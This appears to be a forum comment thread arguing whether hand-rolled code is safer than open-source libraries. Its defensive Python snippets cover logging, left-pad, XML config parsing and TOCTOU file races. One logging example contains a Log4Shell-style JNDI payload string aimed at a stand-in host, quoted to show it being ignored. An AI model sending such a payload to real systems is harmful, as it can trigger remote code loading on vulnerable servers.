> we're entering a more hardened era of software
This is one force at work. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have reached for an open source library.
I think the net effect will be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OSS library; there's no reason to assume the average author would magically create fewer bugs than the original OSS library authors initially did. But the vulnerabilities will have much narrower scope: if you successfully exploit an OSS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economics of finding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
If I hand-roll my logging library, I'm unlikely to include automatic LDAP requests based on message text (the infamous Log4j vulnerability).
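As a sketch of what that buys you (hypothetical helper names, not any real library's API): a hand-rolled logger can treat the message as opaque text, so nothing like Log4j's `${jndi:...}` lookup machinery is even reachable from attacker-controlled input.

```python
import sys
import datetime

def format_line(level, message):
    """Format a log line. The message is opaque text: nothing inside it is
    ever parsed or interpreted, so input like "${jndi:ldap://...}" is just
    characters, never a network request."""
    timestamp = datetime.datetime.now().isoformat(timespec="seconds")
    return f"{timestamp} [{level}] {message}"

def log(level, message):
    """Write one formatted line to stderr. That's the whole feature set."""
    sys.stderr.write(format_line(level, message) + "\n")

# Attacker-controlled text is printed verbatim, never resolved:
log("INFO", "user input: ${jndi:ldap://evil.example/a}")
```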
I'm seeing a lot of similar things in code reviews of substantially LLM-produced codebases now. Half-baked bad ideas that probably leaked in from training sets.
That particular vulnerability, sure, but there's lots of ways to make mistakes.
While agreeing, it also changes the mathematics of it: if a bad actor wants to hack me specifically now they have to write custom code that targets my software after figuring out what it _is_. This swaps the asymmetry around: instead of one bad actor writing an exploit for all the world (and those exploits being even harder to find), you have to hate me specifically.
Admittedly, not hard to do, but it could save some other folks.
Typically when hand-rolling code you implement only what you require for your use case, while a library will be more general-purpose. As a consequence of doing more, it has more code and more bugs.
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
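To make the "focused custom implementation" concrete, here's a minimal left-pad sketch with the edge cases handled explicitly (this is my own illustration, not the npm leftpad code):

```python
def left_pad(value, length, ch=" "):
    """Pad `value` on the left to `length` characters with `ch`.

    Edge cases handled explicitly: non-string values are coerced,
    a target length shorter than the input is a no-op, and only a
    single pad character is ever used.
    """
    s = str(value)                        # coerce numbers etc. to text
    if not isinstance(length, int) or length <= len(s):
        return s                          # nothing to pad
    ch = str(ch)[0] if ch else " "        # empty pad char falls back to space
    return ch * (length - len(s)) + s
```

(In real Python you'd just use `str.rjust`, which is rather the point: the whole feature fits in a few auditable lines.)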
Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.
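A sketch of that idea (tag names are made up for illustration): read exactly the three settings you need via the stdlib parser, which doesn't fetch external entities, and don't expose any of the rest of XML's surface area.

```python
import xml.etree.ElementTree as ET

CONFIG = "<config><host>db.local</host><port>5432</port><debug>false</debug></config>"

def load_config(text):
    """Read exactly three known settings and nothing else.

    Python's stdlib ElementTree does not resolve external entities, and
    since this code only looks up three fixed tags, DTD tricks and the
    rest of the XML feature set simply aren't reachable from here.
    """
    root = ET.fromstring(text)
    return {key: root.findtext(key) for key in ("host", "port", "debug")}
```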
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
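For anyone unfamiliar with that bug class, here's a minimal Python sketch of the check-then-use race (TOCTOU) and the usual fix -- my own illustration, not the actual coreutils code:

```python
import os
import stat

def read_if_regular_unsafe(path):
    """TOCTOU bug: between the check and the open, an attacker can
    replace `path` with a symlink to a file they shouldn't reach."""
    if os.path.isfile(path) and not os.path.islink(path):
        with open(path, "rb") as f:   # `path` may have changed by now
            return f.read()
    return None

def read_if_regular(path):
    """Safer pattern (POSIX): open first, refusing symlinks, then check
    the properties of the descriptor we actually opened."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            return None
        with os.fdopen(fd, "rb") as f:
            fd = -1                   # ownership moved to the file object
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)
```

The point being: the race isn't a memory-safety bug, so a Rust rewrite doesn't prevent it.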
This argument goes even further. If you have only 3 settings, why does it need to be an xml file?
ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.
Real-world reasons I can think of: because it might grow in the future and you want to allow flexibility for that; because it might be the input to or output from some external system that requires XML; because your team might have standardised on always using XML config files; because introducing yet another custom plain-text file format just creates unnecessary cognitive load for everyone who has to use it.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
> there's no reason to assume the average author would magically create fewer bugs than the original OSS library authors initially did
Have you read this old code? It's terrible -- written, often in C, with no care at all for security. AI is much, much better at writing code.
Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
> even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel
There have been two LPE vulnerabilities with exploits announced in the Linux kernel today, after the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
One. "Copy Fail 2" and "Dirty Frag" are the same thing.
And considering the size of the kernel, I call this stupendously good.
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.
Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously safer than software accomplishing the same task that was hand-written by either a human or an LLM last week.